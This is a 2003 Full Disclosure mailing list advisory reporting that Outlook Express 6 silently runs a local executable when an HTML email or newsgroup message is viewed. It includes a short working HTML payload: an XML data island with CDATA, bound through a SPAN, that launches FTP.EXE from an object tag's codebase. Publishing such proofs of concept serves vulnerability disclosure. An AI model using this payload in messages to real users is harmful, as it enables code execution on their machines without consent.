Full Disclosure mailing list archives
O UTLO OK EXP RE SS 6 .00 : broken
From: "http-equiv () excite com" <http-equiv () malware com>
Date: Sat, 22 Feb 2003 14:41:09 -0000
Saturday, February 22, 2003 Technical silent delivery and installation of an executable no client input other than reading an email or viewing a newsgroup message. Outlook Express 6.00 SP1 Cumulative Pack 1 2 3 4 whatever. This should not be possible. When viewing an email message or a newsgroup message, Outlook Express creates a temp file in the Internet Explorer cache. From here security should be governed by Internet Explorer's security settings. In an html email with internet zone applied, this will not function: <object classid="clsid:11111111-1111-1111-1111" codebase="C:\WINDOWS\FTP.EXE"></object> [screen shot: http://www.malware.com/tsktsk.png 11KB] In an html email message or newsgroup message with internet zone applied this will function: <xml id=oExec> <security><exploit> <![CDATA[ <object id="oFile" classid="clsid:11111111-1111-1111-1111" codebase="C:\WINDOWS\FTP.EXE"></object>]]></exploit></security></xml> <SPAN dataFld=exploit dataFormatAs=html dataSrc=#oExec></SPAN> courtesy of: http://sec.greymagic.com/adv/gm001-ie/ [screen shot: http://www.malware.com/tsktsktsk.png 11KB] NOTE: that default installations of Outlook Express 6.00 are with restricted zone applied. However there still remain many 'happy people' out there that enjoy their html mail messages and html newsgroup messages, and coupling the above with any one of a million other unsolved problems now and in the future with Internet Explorer and Outlook Express, including a new http://www.malware.com/stench.html we are back in business. Notes: This is supposed to be patched: http://microsoft.com/technet/security/bulletin/MS02-015.asp 28 March 2002 Keywords: experts Academic Advisory Board Think Tank security concepts -- http://www.malware.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- O UTLO OK EXP RE SS 6 .00 : broken http-equiv () excite com (Feb 22)
- Re: O UTLO OK EXP RE SS 6 .00 : broken Thor Larholm (Feb 24)
- <Possible follow-ups>
- RE: O UTLO OK EXP RE SS 6 .00 : broken Schmehl, Paul L (Feb 22)